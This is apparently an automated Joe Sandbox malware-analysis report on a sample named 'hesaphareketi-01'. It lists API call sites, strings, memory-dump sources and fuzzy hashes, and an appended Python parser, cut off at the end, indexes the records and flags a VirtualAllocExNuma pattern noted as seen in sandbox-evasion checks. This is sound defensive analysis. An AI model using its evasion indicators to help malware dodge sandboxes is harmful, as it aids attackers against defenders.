                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
                                                  • String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
                                                  • API String ID: 133006248-518909315
                                                  • Opcode ID: 542490f3281f9ec5935c23756829aefb1db30947c7d8b3d75492c27f59141b81
                                                  • Instruction ID: 5ce50fb4fd6f6dcf7b0c600626df54ad6e42c0ee62e5d4e84612f2d74fb2546c
                                                  • Opcode Fuzzy Hash: 542490f3281f9ec5935c23756829aefb1db30947c7d8b3d75492c27f59141b81
                                                  • Instruction Fuzzy Hash: 5A027065E1DA07A2FE1CFF23B8D1274A291AF45790FC44139D84ED77A1DE3CA880A625
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: EXv
                                                  • API String ID: 0-3696471021
                                                  • Opcode ID: 2c7a140566dae9a4fba68076e8192626d085c825284fdfb18a21c1693e6838f9
                                                  • Instruction ID: 7b04b9063a4d0bfba8079ee369c732afbf140fb96a693970389e1dee4e95fe12
                                                  • Opcode Fuzzy Hash: 2c7a140566dae9a4fba68076e8192626d085c825284fdfb18a21c1693e6838f9
                                                  • Instruction Fuzzy Hash: 3862A672A19A46A5EB5DAF27A5C0375F3D1BF45780F908239DA0DE3660EF3CA841B610
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentProcess
                                                  • String ID:
                                                  • API String ID: 2050909247-0
                                                  • Opcode ID: 604403f3aac9de18e02c808f39cfdf9296956c65b9ee2d11eb55e13a3e953c9f
                                                  • Instruction ID: 453c21dc387c1d307230c54c061feb10a5d6febd6eabd09976c257bc9fe93d99
                                                  • Opcode Fuzzy Hash: 604403f3aac9de18e02c808f39cfdf9296956c65b9ee2d11eb55e13a3e953c9f
                                                  • Instruction Fuzzy Hash: 48029562E0D646A6FA2DAF27B8C4234E7D1BF46744F844639C54DF3260DF3DB840A622
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4758fcd36253205b66e6ee8f40eaefffe5d4d9abfaad721640ae2f4df7b9cc35
                                                  • Instruction ID: 2ab781a13b8cda81212beb86189d4bcd75a276edaea15a2e48024818aa82e361
                                                  • Opcode Fuzzy Hash: 4758fcd36253205b66e6ee8f40eaefffe5d4d9abfaad721640ae2f4df7b9cc35
                                                  • Instruction Fuzzy Hash: 39F17022D1DB4766FA1EFF27A9C1274E2956F56340FC4533AD50DE32A2EF3C6491A220

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                                                  • String ID: @$@$@
                                                  • API String ID: 2645093340-1177533131
                                                  • Opcode ID: f97ad304849a1431e4f3e87175d7cbd2d95d287c41a756e0b52c30f8d3b71cfe
                                                  • Instruction ID: f5c4f7a2ed0f84d468dcc2cd8ac1baab5263cc5497099b3327b7077d4e7f2f35
                                                  • Opcode Fuzzy Hash: f97ad304849a1431e4f3e87175d7cbd2d95d287c41a756e0b52c30f8d3b71cfe
                                                  • Instruction Fuzzy Hash: 63514036709AD196EB759F12F8903AAF3A0FB88B50F844135CA9D93B88CF3DD4459714

                                                  Control-flow Graph

                                                  APIs
                                                  • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF7341D55CB), ref: 00007FF7341DAE3B
                                                    • Part of subcall function 00007FF7341E24C0: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E24CF
                                                    • Part of subcall function 00007FF7341E24C0: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E250D
                                                    • Part of subcall function 00007FF7341E24C0: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E2539
                                                    • Part of subcall function 00007FF7341E24C0: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E254A
                                                    • Part of subcall function 00007FF7341E24C0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E2559
                                                    • Part of subcall function 00007FF7341DD5C0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7341DD6BD
                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF7341D55CB), ref: 00007FF7341DAEAA
                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF7341DAEBD
                                                  • QueryInformationJobObject.KERNEL32 ref: 00007FF7341DAF0E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
                                                  • String ID: PROCESSOR_COUNT
                                                  • API String ID: 296690692-4048346908
                                                  • Opcode ID: b270e94377580d3288a1bcf3e941d1207372f9dfc2ea9df1a3f3ba46b40a03d9
                                                  • Instruction ID: 184e066ee406d4384f849d3142e6575cc5df99f50ed20037761f647b6776fc80
                                                  • Opcode Fuzzy Hash: b270e94377580d3288a1bcf3e941d1207372f9dfc2ea9df1a3f3ba46b40a03d9
                                                  • Instruction Fuzzy Hash: 383183B2A08A4252EE5CEF5AE4C02BDE3A1EF45794FC40035D64DC7695DE3CE449E720

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF7341D6586
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFailFastRaise$Sleep
                                                  • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                                                  • API String ID: 3706814929-926682358
                                                  • Opcode ID: fec1ccdd5174ac2505eae89ee321da76851430eb507b79bb22477138be6a87ff
                                                  • Instruction ID: d3094dc0b6db9bf1ebeebdb73110983e8a87e5a493e3233e1c668a86af481231
                                                  • Opcode Fuzzy Hash: fec1ccdd5174ac2505eae89ee321da76851430eb507b79bb22477138be6a87ff
                                                  • Instruction Fuzzy Hash: 98414276929A41A2EF98BF16F490379B3A0EF15B88F844039C94D833A4DF3DE440D350

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
                                                  • String ID:
                                                  • API String ID: 2150560229-0
                                                  • Opcode ID: 797a42ad1a02e68e8dda0a1c160f46f9bccc89019008f5d8015a25128a62028d
                                                  • Instruction ID: f17ba89e616bbe0081b42f42c9416947bdf2876a94d0f3af73327a59b1e0eb0c
                                                  • Opcode Fuzzy Hash: 797a42ad1a02e68e8dda0a1c160f46f9bccc89019008f5d8015a25128a62028d
                                                  • Instruction Fuzzy Hash: 21E06DA5B0471292EB19AF22BC5837AA350AF98B85F884038CD4E57364EF3C91859610

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentGlobalMemoryProcessStatus
                                                  • String ID: @
                                                  • API String ID: 3261791682-2766056989
                                                  • Opcode ID: 08fb357760ee07a770a744109e7a6e344503c8149823deb5f180863c7e2f9c72
                                                  • Instruction ID: 9c737f8a50a79c5cb41553b8acdc989b8ec6d69c4095b94159e4a1de3dac0fe0
                                                  • Opcode Fuzzy Hash: 08fb357760ee07a770a744109e7a6e344503c8149823deb5f180863c7e2f9c72
                                                  • Instruction Fuzzy Hash: 03412235A09F0652E99ADE37A1A0339D2526F5ABC0F58C731E90EA3784FF3DE4C19610

                                                  Control-flow Graph

                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF7341ED326,?,-8000000000000000,00000001,00007FF7341FC4E6), ref: 00007FF7342014FA
                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF7341ED326,?,-8000000000000000,00000001,00007FF7341FC4E6), ref: 00007FF734201569
                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF7341ED326,?,-8000000000000000,00000001,00007FF7341FC4E6), ref: 00007FF7342015B2
                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF7341ED326,?,-8000000000000000,00000001,00007FF7341FC4E6), ref: 00007FF7342015C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3168844106-0
                                                  • Opcode ID: b425638a6e70c30cd72ce7cc57c0788705c17328c805340536d3a1b7a1700000
                                                  • Instruction ID: 59d622d09cedc81576e92fd542a0794a8e3f9abd7cde62d30b24a1ef0d36cc44
                                                  • Opcode Fuzzy Hash: b425638a6e70c30cd72ce7cc57c0788705c17328c805340536d3a1b7a1700000
                                                  • Instruction Fuzzy Hash: 87518422A08A42B1EB28EF12E8C4274E7A0FF05794FC40135DA5DE7AA5CF3DE555E321

                                                  Control-flow Graph

                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF7341FD839), ref: 00007FF734210320
                                                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF7341FD839), ref: 00007FF734210396
                                                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF7341FD839), ref: 00007FF7342103EE
                                                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF7341FD839), ref: 00007FF734210414
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3168844106-0
                                                  • Opcode ID: 13d948e5fa3df0cfca703f1770c43ab0ec44fa3814605dd8c07f8631823b0f7e
                                                  • Instruction ID: 0d230f44eebb4bba072126c4d1826a3ed1d41bf599041253bf2b6c3df1437775
                                                  • Opcode Fuzzy Hash: 13d948e5fa3df0cfca703f1770c43ab0ec44fa3814605dd8c07f8631823b0f7e
                                                  • Instruction Fuzzy Hash: 53414F62A0C616B2EA28FF03E8C0379E264FF15350FC50039D94DE7A92DE7DE840A321

                                                  Control-flow Graph

                                                   • Control-flow graph image not captured. Recoverable information from the graph data: basic blocks run from 7ff7341ecd40 through 7ff7341ed00d; SwitchToThread is called in the blocks starting at 7ff7341ece18, 7ff7341ece29 and 7ff7341ece55; the function calls into 7ff7341d9560, 7ff7341d94e0, 7ff7341e26f0, 7ff7341ed470, 7ff7341ed9f0, 7ff7341f3480, 7ff7342049a0, 7ff73420e0c0, 7ff734210690 and 7ff7342104d0. The graph legend distinguished executed from not-executed blocks, but that colouring is not recoverable from the text.
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SwitchThread
                                                  • String ID:
                                                  • API String ID: 115865932-0
                                                  • Opcode ID: 0367fbf184d9da815e74a64e67e3c73c88d77959e1b0efac48cd030915a12f3a
                                                  • Instruction ID: 0247cbf28bcf3c0c3cb277d1e697104915b0aad3c2f0d447f8d3bd24e592d9bb
                                                  • Opcode Fuzzy Hash: 0367fbf184d9da815e74a64e67e3c73c88d77959e1b0efac48cd030915a12f3a
                                                  • Instruction Fuzzy Hash: FF718625F08A4367FA2C7F57B8C0675A691AF01744F840139E95DE71D1EF3DF480A664

                                                  Control-flow Graph

                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF7341E5158,?,?,0000000A,00007FF7341E41B0,?,?,00000000,00007FF7341DE8A1), ref: 00007FF7341E2767
                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF7341E5158,?,?,0000000A,00007FF7341E41B0,?,?,00000000,00007FF7341DE8A1), ref: 00007FF7341E2787
                                                  • VirtualAllocExNuma.KERNEL32 ref: 00007FF7341E27A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual$CurrentNumaProcess
                                                  • String ID:
                                                  • API String ID: 647533253-0
                                                  • Opcode ID: 0ee9833a7794a767601698390b6fdb287f23bc31715070173f580906f203b271
                                                  • Instruction ID: 35d595c7fbe956ae3fa9ab02320a8af92d12a6f17285edfa13219d68e0ae19b1
                                                  • Opcode Fuzzy Hash: 0ee9833a7794a767601698390b6fdb287f23bc31715070173f580906f203b271
                                                  • Instruction Fuzzy Hash: 04F0C271B086E183EB249F06F440229E760AB49FD5F980139EF8C67B68CF3DD5819B14
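A small parser for the per-function records in this listing, added here as a worked example (it is not Joe Sandbox's own tooling, and the excerpt it parses is a constructed copy of three records from this page, trimmed so the script runs offline). It pulls each function's API call sites and Similarity fields (API ID, Opcode ID, fuzzy hashes) into records, groups them by API ID so the same API mix can be matched across dumps or samples, and flags the VirtualAlloc / GetCurrentProcess / VirtualAllocExNuma triple listed just above. That triple is something to pivot on rather than to read as proof of intent: VirtualAllocExNuma shows up both in sandbox-evasion checks and in ordinary runtime memory managers, and the call signature alone does not say which applies here.

```python
"""Parse Joe Sandbox per-function records (APIs + Similarity fields) and index
them for pivoting. Added example; not Joe Sandbox tooling."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt in the same shape as the records on this page (three functions).
SAMPLE_REPORT = """\
APIs
• VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF7341E5158), ref: 00007FF7341E2767
• GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF7341E5158), ref: 00007FF7341E2787
• VirtualAllocExNuma.KERNEL32 ref: 00007FF7341E27A8
Memory Dump Source
• Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
Similarity
• API ID: AllocVirtual$CurrentNumaProcess
• String ID:
• API String ID: 647533253-0
• Opcode ID: 0ee9833a7794a767601698390b6fdb287f23bc31715070173f580906f203b271
• Instruction Fuzzy Hash: 04F0C271B086E183EB249F06F440229E760AB49FD5F980139EF8C67B68CF3DD5819B14
APIs
• EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF7341FD839), ref: 00007FF734210320
• LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF7341FD839), ref: 00007FF734210396
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
• Opcode ID: 13d948e5fa3df0cfca703f1770c43ab0ec44fa3814605dd8c07f8631823b0f7e
APIs
  • Part of subcall function 00007FF7341E27D0: VirtualFree.KERNELBASE ref: 00007FF7341E27DA
• EnterCriticalSection.KERNEL32(?,?,?,00007FF7341F64F9), ref: 00007FF734210472
• LeaveCriticalSection.KERNEL32(?,?,?,00007FF7341F64F9), ref: 00007FF73421049C
Similarity
• API ID: CriticalSection$EnterFreeLeaveVirtual
• String ID:
• API String ID: 1320683145-0
• Opcode ID: b5911a8c8c100c65425a835202cd376d10abe74bf2f3be4458c4a8add018ab75
"""

# One call line: "• Api.MODULE(args), ref: ADDR", args optional, optionally
# prefixed by "Part of subcall function ADDR:" for calls made by a callee.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<module>[\w\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Identity / similarity fields that follow the call list.
FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*?)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str                          # address of the call instruction
    args: str = ""                    # argument list as reported ("?" = unresolved)
    subcall_of: Optional[str] = None  # set when reported under "Part of subcall function"


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def direct_apis(self) -> set:
        """API names this function calls itself (subcall lines excluded)."""
        return {c.api for c in self.calls if c.subcall_of is None}

    def start(self) -> Optional[str]:
        """Lowest direct call-site address; a cheap stand-in for the function's location."""
        refs = [c.ref for c in self.calls if c.subcall_of is None]
        return min(refs, key=lambda r: int(r, 16)) if refs else None


def parse_report(text: str) -> list:
    """Split the listing into records; each record opens with an 'APIs' header."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m["key"]] = m["val"]
            continue
        m = CALL_RE.match(line)
        if m:  # other lines (Memory Dump Source, Snapshot File, headers) are skipped
            current.calls.append(ApiCall(m["api"], m["module"], m["ref"], m["args"] or "", m["sub"]))
    return records


def index_by_api_id(records) -> dict:
    """Group functions by Joe Sandbox's API ID so the same API mix lines up across dumps."""
    idx = defaultdict(list)
    for r in records:
        idx[r.fields.get("API ID", "")].append(r)
    return dict(idx)


def find_call_sites(records, api_name: str) -> list:
    """Every direct call-site address of api_name, in report order."""
    return [c.ref for r in records for c in r.calls if c.api == api_name and c.subcall_of is None]


def flag_alloc_numa(records) -> list:
    """Opcode IDs of functions whose direct API mix is exactly the
    VirtualAlloc / GetCurrentProcess / VirtualAllocExNuma triple, for pivoting."""
    wanted = {"VirtualAlloc", "GetCurrentProcess", "VirtualAllocExNuma"}
    return [r.fields.get("Opcode ID", "") for r in records if r.direct_apis() == wanted]


if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    for api_id, group in index_by_api_id(recs).items():
        print(api_id, [r.start() for r in group])
    print("EnterCriticalSection sites:", find_call_sites(recs, "EnterCriticalSection"))
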